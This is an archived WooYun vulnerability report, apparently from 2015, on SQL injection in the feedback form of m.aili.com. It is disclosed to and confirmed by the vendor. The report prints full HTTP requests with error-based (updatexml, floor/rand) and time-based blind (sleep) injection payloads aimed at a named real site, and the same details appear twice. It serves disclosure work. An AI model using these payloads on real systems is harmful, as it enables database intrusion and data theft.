当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105100

漏洞标题:爱丽网某站mysql注入

相关厂商:aili.com

漏洞作者: 路人甲

提交时间:2015-04-01 10:29

修复时间:2015-05-16 11:24

公开时间:2015-05-16 11:24

漏洞类型:网络敏感信息泄漏

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-01: 细节已通知厂商并且等待厂商处理中
2015-04-01: 厂商已经确认,细节仅向厂商公开
2015-04-11: 细节向核心白帽子及相关领域专家公开
2015-04-21: 细节向普通白帽子公开
2015-05-01: 细节向实习白帽子公开
2015-05-16: 细节向公众公开

简要描述:

盲注

详细说明:

网站:m.aili.com
info 和emil都存在注入,两个点结合才能利用
首先是报错注入

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 40
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=



HTTP/1.1 200 OK
Date: Fri, 20 Feb 2015 23:50:36 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 shhl147:9 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 1564

System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','')<!DOCTYPE html>
<html>
<head>


两个地方结合闭合括号才能利用,目测是二次注入

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 43
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=a

HTTP/1.1 200 OK
Date: Fri, 27 Feb 2015 13:24:21 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 jsycdx94:9 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 1566

System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','a\')<!DOCTYPE html>
<html>
<head>


构造如下报错注入不能成功

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 61
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))%23


这个payload也不行
(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from

information_schema.tables group by x)a)


暂时只能盲注

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 61
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,NULL%2bsleep(3))%23


出点数据吧:

database()=neqcmsK*

漏洞证明:

网站:m.aili.com
info 和emil都存在注入,两个点结合才能利用
首先是报错注入

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 40
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=



HTTP/1.1 200 OK
Date: Fri, 20 Feb 2015 23:50:36 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 shhl147:9 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 1564

System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','')<!DOCTYPE html>
<html>
<head>


两个地方结合闭合括号才能利用,目测是二次注入

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 43
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=a

HTTP/1.1 200 OK
Date: Fri, 27 Feb 2015 13:24:21 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 jsycdx94:9 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 1566

System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','a\')<!DOCTYPE html>
<html>
<head>


构造如下报错注入不能成功

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 61
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))%23


这个payload也不行
(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from

information_schema.tables group by x)a)


暂时只能盲注

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 61
Accept-Encoding: gzip, deflate

email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,NULL%2bsleep(3))%23


出点数据吧:

database()=neqcmsK*

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-04-01 11:22

厂商回复:

裤子接二连三的被脱,真是……

最新状态:

暂无


漏洞评价:

评论

  1. 2015-04-27 18:38 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    @爱丽网 你还有裤子吗 被扒烂了几个了 哈哈